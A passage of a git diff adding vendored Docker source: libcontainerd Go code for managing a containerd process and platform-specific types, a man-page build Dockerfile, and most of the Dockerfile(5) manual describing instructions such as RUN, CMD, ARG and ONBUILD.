+ // redirect containerd logs to docker logs + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.SysProcAttr = setSysProcAttr(true) + cmd.Env = nil + // clear the NOTIFY_SOCKET from the env when starting containerd + for _, e := range os.Environ() { + if !strings.HasPrefix(e, "NOTIFY_SOCKET") { + cmd.Env = append(cmd.Env, e) + } + } + if err := cmd.Start(); err != nil { + return err + } + logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid) + if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil { + utils.KillProcess(cmd.Process.Pid) + return err + } + if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil { + utils.KillProcess(cmd.Process.Pid) + return err + } + + r.daemonWaitCh = make(chan struct{}) + go func() { + cmd.Wait() + close(r.daemonWaitCh) + }() // Reap our child when needed + r.daemonPid = cmd.Process.Pid + return nil +} + +// WithRemoteAddr sets the external containerd socket to connect to. +func WithRemoteAddr(addr string) RemoteOption { + return rpcAddr(addr) +} + +type rpcAddr string + +func (a rpcAddr) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.rpcAddr = string(a) + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithRuntimePath sets the path of the runtime to be used as the +// default by containerd +func WithRuntimePath(rt string) RemoteOption { + return runtimePath(rt) +} + +type runtimePath string + +func (rt runtimePath) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.runtime = string(rt) + return nil + } + return fmt.Errorf("WithRuntime option not supported for this remote") +} + +// WithRuntimeArgs sets the list of runtime args passed to containerd +func WithRuntimeArgs(args []string) RemoteOption { + return runtimeArgs(args) +} + +type runtimeArgs []string + +func (rt runtimeArgs) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.runtimeArgs = rt + return nil + } + return fmt.Errorf("WithRuntimeArgs option not supported for this remote") +} + +// WithStartDaemon defines if libcontainerd should also run containerd daemon. +func WithStartDaemon(start bool) RemoteOption { + return startDaemon(start) +} + +type startDaemon bool + +func (s startDaemon) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.startDaemon = bool(s) + return nil + } + return fmt.Errorf("WithStartDaemon option not supported for this remote") +} + +// WithDebugLog defines if containerd debug logs will be enabled for daemon. +func WithDebugLog(debug bool) RemoteOption { + return debugLog(debug) +} + +type debugLog bool + +func (d debugLog) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.debugLog = bool(d) + return nil + } + return fmt.Errorf("WithDebugLog option not supported for this remote") +} + +// WithLiveRestore defines if containers are stopped on shutdown or restored. +func WithLiveRestore(v bool) RemoteOption { + return liveRestore(v) +} + +type liveRestore bool + +func (l liveRestore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.liveRestore = bool(l) + for _, c := range remote.clients { + c.liveRestore = bool(l) + } + return nil + } + return fmt.Errorf("WithLiveRestore option not supported for this remote") +} + +// WithOOMScore defines the oom_score_adj to set for the containerd process. +func WithOOMScore(score int) RemoteOption { + return oomScore(score) +} + +type oomScore int + +func (o oomScore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.oomScore = int(o) + return nil + } + return fmt.Errorf("WithOOMScore option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go new file mode 100644 index 0000000000..74c10447bb --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go @@ -0,0 +1,36 @@ +package libcontainerd + +import "github.com/docker/docker/pkg/locker" + +type remote struct { +} + +func (r *remote) Client(b Backend) (Client, error) { + c := &client{ + clientCommon: clientCommon{ + backend: b, + containers: make(map[string]*container), + locker: locker.New(), + }, + } + return c, nil +} + +// Cleanup is a no-op on Windows. It is here to implement the interface. +func (r *remote) Cleanup() { +} + +func (r *remote) UpdateOptions(opts ...RemoteOption) error { + return nil +} + +// New creates a fresh instance of libcontainerd remote. On Windows, +// this is not used as there is no remote containerd process. +func New(_ string, _ ...RemoteOption) (Remote, error) { + return &remote{}, nil +} + +// WithLiveRestore is a noop on windows. +func WithLiveRestore(v bool) RemoteOption { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go new file mode 100644 index 0000000000..3d981e3371 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types.go @@ -0,0 +1,75 @@ +package libcontainerd + +import ( + "io" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +// State constants used in state change reporting. +const ( + StateStart = "start-container" + StatePause = "pause" + StateResume = "resume" + StateExit = "exit" + StateRestore = "restore" + StateExitProcess = "exit-process" + StateOOM = "oom" // fake state +) + +// CommonStateInfo contains the state info common to all platforms. +type CommonStateInfo struct { // FIXME: event? + State string + Pid uint32 + ExitCode uint32 + ProcessID string +} + +// Backend defines callbacks that the client of the library needs to implement. +type Backend interface { + StateChanged(containerID string, state StateInfo) error +} + +// Client provides access to containerd features. +type Client interface { + GetServerVersion(ctx context.Context) (*ServerVersion, error) + Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error + Signal(containerID string, sig int) error + SignalProcess(containerID string, processFriendlyName string, sig int) error + AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error) + Resize(containerID, processFriendlyName string, width, height int) error + Pause(containerID string) error + Resume(containerID string) error + Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error + Stats(containerID string) (*Stats, error) + GetPidsForContainer(containerID string) ([]int, error) + Summary(containerID string) ([]Summary, error) + UpdateResources(containerID string, resources Resources) error + CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error + DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error + ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) +} + +// CreateOption allows to configure parameters of container creation. +type CreateOption interface { + Apply(interface{}) error +} + +// StdioCallback is called to connect a container or process stdio. +type StdioCallback func(IOPipe) error + +// IOPipe contains the stdio streams. +type IOPipe struct { + Stdin io.WriteCloser + Stdout io.ReadCloser + Stderr io.ReadCloser + Terminal bool // Whether stderr is connected on Windows +} + +// ServerVersion contains version information as retrieved from the +// server +type ServerVersion struct { + containerd.GetServerVersionResponse +} diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go new file mode 100644 index 0000000000..cc2a17aec6 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go @@ -0,0 +1,49 @@ +package libcontainerd + +import ( + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process struct { + // Terminal creates an interactive terminal for the container. + Terminal bool `json:"terminal"` + // User specifies user information for the process. + User *specs.User `json:"user"` + // Args specifies the binary and arguments for the application to execute. + Args []string `json:"args"` + // Env populates the process environment for the process. + Env []string `json:"env,omitempty"` + // Cwd is the current working directory for the process and must be + // relative to the container's root. + Cwd *string `json:"cwd"` + // Capabilities are linux capabilities that are kept for the container. + Capabilities []string `json:"capabilities,omitempty"` + // Rlimits specifies rlimit options to apply to the process. + Rlimits []specs.Rlimit `json:"rlimits,omitempty"` + // ApparmorProfile specifies the apparmor profile for the container. + ApparmorProfile *string `json:"apparmorProfile,omitempty"` + // SelinuxLabel specifies the selinux context that the container process is run as. + SelinuxLabel *string `json:"selinuxLabel,omitempty"` +} + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + OOMKilled bool +} + +// Stats contains a stats properties from containerd. +type Stats containerd.StatsResponse + +// Summary contains a container summary from containerd +type Summary struct{} + +// Resources defines updatable container resource values. +type Resources containerd.UpdateResource + +// Checkpoints contains the details of a checkpoint +type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go new file mode 100644 index 0000000000..dbafef669f --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go @@ -0,0 +1,43 @@ +package libcontainerd + +import ( + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process struct { + // Terminal creates an interactive terminal for the container. + Terminal bool `json:"terminal"` + // User specifies user information for the process. + User *specs.User `json:"user"` + // Args specifies the binary and arguments for the application to execute. + Args []string `json:"args"` + // Env populates the process environment for the process. + Env []string `json:"env,omitempty"` + // Cwd is the current working directory for the process and must be + // relative to the container's root. + Cwd *string `json:"cwd"` + // Capabilities are linux capabilities that are kept for the container. + Capabilities []string `json:"capabilities,omitempty"` +} + +// Stats contains a stats properties from containerd. +type Stats struct{} + +// Summary contains a container summary from containerd +type Summary struct{} + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + OOMKilled bool +} + +// Resources defines updatable container resource values. +type Resources struct{} + +// Checkpoints contains the details of a checkpoint +type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go new file mode 100644 index 0000000000..24a9a96440 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go @@ -0,0 +1,79 @@ +package libcontainerd + +import ( + "github.com/Microsoft/hcsshim" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process specs.Process + +// Summary contains a ProcessList item from HCS to support `top` +type Summary hcsshim.ProcessListItem + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + + UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container. +} + +// Stats contains statics from HCS +type Stats hcsshim.Statistics + +// Resources defines updatable container resource values. +type Resources struct{} + +// ServicingOption is a CreateOption with a no-op application that signifies +// the container needs to be used for a Windows servicing operation. +type ServicingOption struct { + IsServicing bool +} + +// FlushOption is a CreateOption that signifies if the container should be +// started with flushes ignored until boot has completed. This is an optimisation +// for first boot of a container. +type FlushOption struct { + IgnoreFlushesDuringBoot bool +} + +// HyperVIsolationOption is a CreateOption that indicates whether the runtime +// should start the container as a Hyper-V container, and if so, the sandbox path. +type HyperVIsolationOption struct { + IsHyperV bool + SandboxPath string `json:",omitempty"` +} + +// LayerOption is a CreateOption that indicates to the runtime the layer folder +// and layer paths for a container. +type LayerOption struct { + // LayerFolder is the path to the current layer folder. Empty for Hyper-V containers. + LayerFolderPath string `json:",omitempty"` + // Layer paths of the parent layers + LayerPaths []string +} + +// NetworkEndpointsOption is a CreateOption that provides the runtime list +// of network endpoints to which a container should be attached during its creation. +type NetworkEndpointsOption struct { + Endpoints []string + AllowUnqualifiedDNSQuery bool +} + +// CredentialsOption is a CreateOption that indicates the credentials from +// a credential spec to be used to the runtime +type CredentialsOption struct { + Credentials string +} + +// Checkpoint holds the details of a checkpoint (not supported in windows) +type Checkpoint struct { + Name string +} + +// Checkpoints contains the details of a checkpoint +type Checkpoints struct { + Checkpoints []*Checkpoint +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go new file mode 100644 index 0000000000..78828bcdad --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go @@ -0,0 +1,62 @@ +package libcontainerd + +import ( + "syscall" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func getRootIDs(s specs.Spec) (int, int, error) { + var hasUserns bool + for _, ns := range s.Linux.Namespaces { + if ns.Type == specs.UserNamespace { + hasUserns = true + break + } + } + if !hasUserns { + return 0, 0, nil + } + uid := hostIDFromMap(0, s.Linux.UIDMappings) + gid := hostIDFromMap(0, s.Linux.GIDMappings) + return uid, gid, nil +} + +func hostIDFromMap(id uint32, mp []specs.IDMapping) int { + for _, m := range mp { + if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { + return int(m.HostID + id - m.ContainerID) + } + } + return 0 +} + +func systemPid(ctr *containerd.Container) uint32 { + var pid uint32 + for _, p := range ctr.Processes { + if p.Pid == InitFriendlyName { + pid = p.SystemPid + } + } + return pid +} + +func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) { + for _, r := range sr { + cr = append(cr, &containerd.Rlimit{ + Type: r.Type, + Hard: r.Hard, + Soft: r.Soft, + }) + } + return +} + +// setPDeathSig sets the parent death signal to SIGKILL +func setSysProcAttr(sid bool) *syscall.SysProcAttr { + return &syscall.SysProcAttr{ + Setsid: sid, + Pdeathsig: syscall.SIGKILL, + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go new file mode 100644 index 0000000000..49632b45e5 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go @@ -0,0 +1,27 @@ +package libcontainerd + +import ( + "syscall" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func getRootIDs(s specs.Spec) (int, int, error) { + return 0, 0, nil +} + +func systemPid(ctr *containerd.Container) uint32 { + var pid uint32 + for _, p := range ctr.Processes { + if p.Pid == InitFriendlyName { + pid = p.SystemPid + } + } + return pid +} + +// setPDeathSig sets the parent death signal to SIGKILL +func setSysProcAttr(sid bool) *syscall.SysProcAttr { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go new file mode 100644 index 0000000000..41ac40d2c2 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go @@ -0,0 +1,46 @@ +package libcontainerd + +import "strings" + +// setupEnvironmentVariables converts a string array of environment variables +// into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc. +func setupEnvironmentVariables(a []string) map[string]string { + r := make(map[string]string) + for _, s := range a { + arr := strings.SplitN(s, "=", 2) + if len(arr) == 2 { + r[arr[0]] = arr[1] + } + } + return r +} + +// Apply for a servicing option is a no-op. +func (s *ServicingOption) Apply(interface{}) error { + return nil +} + +// Apply for the flush option is a no-op. +func (f *FlushOption) Apply(interface{}) error { + return nil +} + +// Apply for the hypervisolation option is a no-op. +func (h *HyperVIsolationOption) Apply(interface{}) error { + return nil +} + +// Apply for the layer option is a no-op. +func (h *LayerOption) Apply(interface{}) error { + return nil +} + +// Apply for the network endpoints option is a no-op. +func (s *NetworkEndpointsOption) Apply(interface{}) error { + return nil +} + +// Apply for the credentials option is a no-op. +func (s *CredentialsOption) Apply(interface{}) error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go new file mode 100644 index 0000000000..f3679bfb71 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go @@ -0,0 +1,13 @@ +package libcontainerd + +import ( + "testing" +) + +func TestEnvironmentParsing(t *testing.T) { + env := []string{"foo=bar", "car=hat", "a=b=c"} + result := setupEnvironmentVariables(env) + if len(result) != 3 || result["foo"] != "bar" || result["car"] != "hat" || result["a"] != "b=c" { + t.Fatalf("Expected map[foo:bar car:hat a:b=c], got %v", result) + } +} diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile new file mode 100644 index 0000000000..80e97ff01e --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile @@ -0,0 +1,24 @@ +FROM golang:1.7.5-alpine + +RUN apk add -U git bash curl gcc musl-dev make + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \ + cd ${TARGET}/glide && \ + git checkout $GLIDE && \ + make build && \ + cp ./glide /usr/bin/glide && \ + cd / && rm -rf /go/src/* /go/bin/* /go/pkg/* + +COPY glide.yaml /manvendor/ +COPY glide.lock /manvendor/ +WORKDIR /manvendor/ +RUN glide install && mv vendor src +ENV GOPATH=$GOPATH:/manvendor +RUN go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man + +WORKDIR /go/src/github.com/docker/docker/ +ENTRYPOINT ["man/generate.sh"] diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md new file mode 100644 index 0000000000..5191b1930a --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.5.md @@ -0,0 +1,474 @@ +% DOCKERFILE(5) Docker User Manuals +% Zac Dover +% May 2014 +# NAME + +Dockerfile - automate the steps of creating a Docker image + +# INTRODUCTION + +The **Dockerfile** is a configuration file that automates the steps of creating +a Docker image. It is similar to a Makefile. Docker reads instructions from the +**Dockerfile** to automate the steps otherwise performed manually to create an +image. To build an image, create a file called **Dockerfile**. + +The **Dockerfile** describes the steps taken to assemble the image. When the +**Dockerfile** has been created, call the `docker build` command, using the +path of directory that contains **Dockerfile** as the argument. + +# SYNOPSIS + +INSTRUCTION arguments + +For example: + + FROM image + +# DESCRIPTION + +A Dockerfile is a file that automates the steps of creating a Docker image. +A Dockerfile is similar to a Makefile. + +# USAGE + + docker build . + + -- Runs the steps and commits them, building a final image. + The path to the source repository defines where to find the context of the + build. The build is run by the Docker daemon, not the CLI. The whole + context must be transferred to the daemon. The Docker CLI reports + `"Sending build context to Docker daemon"` when the context is sent to the + daemon. + + ``` + docker build -t repository/tag . + ``` + + -- specifies a repository and tag at which to save the new image if the build + succeeds. The Docker daemon runs the steps one-by-one, committing the result + to a new image if necessary, before finally outputting the ID of the new + image. The Docker daemon automatically cleans up the context it is given. + + Docker re-uses intermediate images whenever possible. This significantly + accelerates the *docker build* process. + +# FORMAT + + `FROM image` + + `FROM image:tag` + + `FROM image@digest` + + -- The **FROM** instruction sets the base image for subsequent instructions. A + valid Dockerfile must have **FROM** as its first instruction. The image can be any + valid image. It is easy to start by pulling an image from the public + repositories. + + -- **FROM** must be the first non-comment instruction in Dockerfile. + + -- **FROM** may appear multiple times within a single Dockerfile in order to create + multiple images. Make a note of the last image ID output by the commit before + each new **FROM** command. + + -- If no tag is given to the **FROM** instruction, Docker applies the + `latest` tag. If the used tag does not exist, an error is returned. + + -- If no digest is given to the **FROM** instruction, Docker applies the + `latest` tag. If the used tag does not exist, an error is returned. + +**MAINTAINER** + -- **MAINTAINER** sets the Author field for the generated images. + Useful for providing users with an email or url for support. + +**RUN** + -- **RUN** has two forms: + + ``` + # the command is run in a shell - /bin/sh -c + RUN + + # Executable form + RUN ["executable", "param1", "param2"] + ``` + + + -- The **RUN** instruction executes any commands in a new layer on top of the current + image and commits the results. The committed image is used for the next step in + Dockerfile. + + -- Layering **RUN** instructions and generating commits conforms to the core + concepts of Docker where commits are cheap and containers can be created from + any point in the history of an image. This is similar to source control. The + exec form makes it possible to avoid shell string munging. The exec form makes + it possible to **RUN** commands using a base image that does not contain `/bin/sh`. + + Note that the exec form is parsed as a JSON array, which means that you must + use double-quotes (") around words not single-quotes ('). + +**CMD** + -- **CMD** has three forms: + + ``` + # Executable form + CMD ["executable", "param1", "param2"]` + + # Provide default arguments to ENTRYPOINT + CMD ["param1", "param2"]` + + # the command is run in a shell - /bin/sh -c + CMD command param1 param2 + ``` + + -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only + the last **CMD** takes effect. + The main purpose of a **CMD** is to provide defaults for an executing container. + These defaults may include an executable, or they can omit the executable. If + they omit the executable, an **ENTRYPOINT** must be specified. + When used in the shell or exec formats, the **CMD** instruction sets the command to + be executed when running the image. + If you use the shell form of the **CMD**, the `` executes in `/bin/sh -c`: + + Note that the exec form is parsed as a JSON array, which means that you must + use double-quotes (") around words not single-quotes ('). + + ``` + FROM ubuntu + CMD echo "This is a test." | wc - + ``` + + -- If you run **command** without a shell, then you must express the command as a + JSON array and give the full path to the executable. This array form is the + preferred form of **CMD**. All additional parameters must be individually expressed + as strings in the array: + + ``` + FROM ubuntu + CMD ["/usr/bin/wc","--help"] + ``` + + -- To make the container run the same executable every time, use **ENTRYPOINT** in + combination with **CMD**. + If the user specifies arguments to `docker run`, the specified commands + override the default in **CMD**. + Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result. + **CMD** executes nothing at build time, but specifies the intended command for + the image. + +**LABEL** + -- `LABEL = [= ...]`or + ``` + LABEL [ ] + LABEL [ ] + ... + ``` + The **LABEL** instruction adds metadata to an image. A **LABEL** is a + key-value pair. To specify a **LABEL** without a value, simply use an empty + string. To include spaces within a **LABEL** value, use quotes and + backslashes as you would in command-line parsing. + + ``` + LABEL com.example.vendor="ACME Incorporated" + LABEL com.example.vendor "ACME Incorporated" + LABEL com.example.vendor.is-beta "" + LABEL com.example.vendor.is-beta= + LABEL com.example.vendor.is-beta="" + ``` + + An image can have more than one label. To specify multiple labels, separate + each key-value pair by a space. + + Labels are additive including `LABEL`s in `FROM` images. As the system + encounters and then applies a new label, new `key`s override any previous + labels with identical keys. + + To display an image's labels, use the `docker inspect` command. + +**EXPOSE** + -- `EXPOSE [...]` + The **EXPOSE** instruction informs Docker that the container listens on the + specified network ports at runtime. Docker uses this information to + interconnect containers using links and to set up port redirection on the host + system. + +**ENV** + -- `ENV ` + The **ENV** instruction sets the environment variable to + the value ``. This value is passed to all future + **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is + functionally equivalent to prefixing the command with `=`. The + environment variables that are set with **ENV** persist when a container is run + from the resulting image. Use `docker inspect` to inspect these values, and + change them using `docker run --env =`. + + Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause + unintended consequences, because it will persist when the container is run + interactively, as with the following command: `docker run -t -i image bash` + +**ADD** + -- **ADD** has two forms: + + ``` + ADD + + # Required for paths with whitespace + ADD ["",... ""] + ``` + + The **ADD** instruction copies new files, directories + or remote file URLs to the filesystem of the container at path ``. + Multiple `` resources may be specified but if they are files or directories + then they must be relative to the source directory that is being built + (the context of the build). The `` is the absolute path, or path relative + to **WORKDIR**, into which the source is copied inside the target container. + If the `` argument is a local file in a recognized compression format + (tar, gzip, bzip2, etc) then it is unpacked at the specified `` in the + container's filesystem. Note that only local compressed files will be unpacked, + i.e., the URL download and archive unpacking features cannot be used together. + All new directories are created with mode 0755 and with the uid and gid of **0**. + +**COPY** + -- **COPY** has two forms: + + ``` + COPY + + # Required for paths with whitespace + COPY ["",... ""] + ``` + + The **COPY** instruction copies new files from `` and + adds them to the filesystem of the container at path . The `` must be + the path to a file or directory relative to the source directory that is + being built (the context of the build) or a remote file URL. The `` is an + absolute path, or a path relative to **WORKDIR**, into which the source will + be copied inside the target container. If you **COPY** an archive file it will + land in the container exactly as it appears in the build context without any + attempt to unpack it. All new files and directories are created with mode **0755** + and with the uid and gid of **0**. + +**ENTRYPOINT** + -- **ENTRYPOINT** has two forms: + + ``` + # executable form + ENTRYPOINT ["executable", "param1", "param2"]` + + # run command in a shell - /bin/sh -c + ENTRYPOINT command param1 param2 + ``` + + -- An **ENTRYPOINT** helps you configure a + container that can be run as an executable. When you specify an **ENTRYPOINT**, + the whole container runs as if it was only that executable. The **ENTRYPOINT** + instruction adds an entry command that is not overwritten when arguments are + passed to docker run. This is different from the behavior of **CMD**. This allows + arguments to be passed to the entrypoint, for instance `docker run -d` + passes the -d argument to the **ENTRYPOINT**. Specify parameters either in the + **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD** + statement. Parameters in the **ENTRYPOINT** are not overwritten by the docker run + arguments. Parameters specified via **CMD** are overwritten by docker run + arguments. Specify a plain string for the **ENTRYPOINT**, and it will execute in + `/bin/sh -c`, like a **CMD** instruction: + + ``` + FROM ubuntu + ENTRYPOINT wc -l - + ``` + + This means that the Dockerfile's image always takes stdin as input (that's + what "-" means), and prints the number of lines (that's what "-l" means). To + make this optional but default, use a **CMD**: + + ``` + FROM ubuntu + CMD ["-l", "-"] + ENTRYPOINT ["/usr/bin/wc"] + ``` + +**VOLUME** + -- `VOLUME ["/data"]` + The **VOLUME** instruction creates a mount point with the specified name and marks + it as holding externally-mounted volumes from the native host or from other + containers. + +**USER** + -- `USER daemon` + Sets the username or UID used for running subsequent commands. + + The **USER** instruction can optionally be used to set the group or GID. The + followings examples are all valid: + USER [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Until the **USER** instruction is set, instructions will be run as root. The USER + instruction can be used any number of times in a Dockerfile, and will only affect + subsequent commands. + +**WORKDIR** + -- `WORKDIR /path/to/workdir` + The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**, + **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can + be used multiple times in a single Dockerfile. Relative paths are defined + relative to the path of the previous **WORKDIR** instruction. For example: + + ``` + WORKDIR /a + WORKDIR b + WORKDIR c + RUN pwd + ``` + + In the above example, the output of the **pwd** command is **a/b/c**. + +**ARG** + -- ARG [=] + + The `ARG` instruction defines a variable that users can pass at build-time to + the builder with the `docker build` command using the `--build-arg + =` flag. If a user specifies a build argument that was not + defined in the Dockerfile, the build outputs a warning. + + ``` + [Warning] One or more build-args [foo] were not consumed + ``` + + The Dockerfile author can define a single variable by specifying `ARG` once or many + variables by specifying `ARG` more than once. For example, a valid Dockerfile: + + ``` + FROM busybox + ARG user1 + ARG buildno + ... + ``` + + A Dockerfile author may optionally specify a default value for an `ARG` instruction: + + ``` + FROM busybox + ARG user1=someuser + ARG buildno=1 + ... + ``` + + If an `ARG` value has a default and if there is no value passed at build-time, the + builder uses the default. + + An `ARG` variable definition comes into effect from the line on which it is + defined in the `Dockerfile` not from the argument's use on the command-line or + elsewhere. For example, consider this Dockerfile: + + ``` + 1 FROM busybox + 2 USER ${user:-some_user} + 3 ARG user + 4 USER $user + ... + ``` + A user builds this file by calling: + + ``` + $ docker build --build-arg user=what_user Dockerfile + ``` + + The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the + subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is + defined and the `what_user` value was passed on the command line. Prior to its definition by an + `ARG` instruction, any use of a variable results in an empty string. + + > **Warning:** It is not recommended to use build-time variables for + > passing secrets like github keys, user credentials etc. Build-time variable + > values are visible to any user of the image with the `docker history` command. + + You can use an `ARG` or an `ENV` instruction to specify variables that are + available to the `RUN` instruction. Environment variables defined using the + `ENV` instruction always override an `ARG` instruction of the same name. Consider + this Dockerfile with an `ENV` and `ARG` instruction. + + ``` + 1 FROM ubuntu + 2 ARG CONT_IMG_VER + 3 ENV CONT_IMG_VER v1.0.0 + 4 RUN echo $CONT_IMG_VER + ``` + Then, assume this image is built with this command: + + ``` + $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile + ``` + + In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting + passed by the user:`v2.0.1` This behavior is similar to a shell + script where a locally scoped variable overrides the variables passed as + arguments or inherited from environment, from its point of definition. + + Using the example above but a different `ENV` specification you can create more + useful interactions between `ARG` and `ENV` instructions: + + ``` + 1 FROM ubuntu + 2 ARG CONT_IMG_VER + 3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} + 4 RUN echo $CONT_IMG_VER + ``` + + Unlike an `ARG` instruction, `ENV` values are always persisted in the built + image. Consider a docker build without the --build-arg flag: + + ``` + $ docker build Dockerfile + ``` + + Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but + its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. + + The variable expansion technique in this example allows you to pass arguments + from the command line and persist them in the final image by leveraging the + `ENV` instruction. Variable expansion is only supported for [a limited set of + Dockerfile instructions.](#environment-replacement) + + Docker has a set of predefined `ARG` variables that you can use without a + corresponding `ARG` instruction in the Dockerfile. + + * `HTTP_PROXY` + * `http_proxy` + * `HTTPS_PROXY` + * `https_proxy` + * `FTP_PROXY` + * `ftp_proxy` + * `NO_PROXY` + * `no_proxy` + + To use these, simply pass them on the command line using the `--build-arg + =` flag. + +**ONBUILD** + -- `ONBUILD [INSTRUCTION]` + The **ONBUILD** instruction adds a trigger instruction to an image. The + trigger is executed at a later time, when the image is used as the base for + another build. Docker executes the trigger in the context of the downstream + build, as if the trigger existed immediately after the **FROM** instruction in + the downstream Dockerfile. + + You can register any build instruction as a trigger. A trigger is useful if + you are defining an image to use as a base for building other images. For + example, if you are defining an application build environment or a daemon that + is customized with a user-specific configuration. + + Consider an image intended as a reusable python application builder. It must + add application source code to a particular directory, and might need a build + script called after that. You can't just call **ADD** and **RUN** now, because + you don't yet have access to the application source code, and it is different + for each application build. + + -- Providing application developers with a boilerplate Dockerfile to copy-paste + into their application is inefficient, error-prone, and + difficult to update because it mixes with application-specific code. + The solution is to use **ONBUILD** to register instructions in advance, to + run later, during the next build stage. + +# HISTORY +*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation. +*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability +*Sept 2015, updated by Sally O'Malley (somalley@redhat.com) +*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com) diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 new file mode 100644 index 0000000000..e788eb1c1d --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile.aarch64 @@ -0,0 +1,25 @@ +FROM aarch64/ubuntu:xenial + +RUN apt-get update && apt-get install -y git golang-go + +RUN mkdir -p 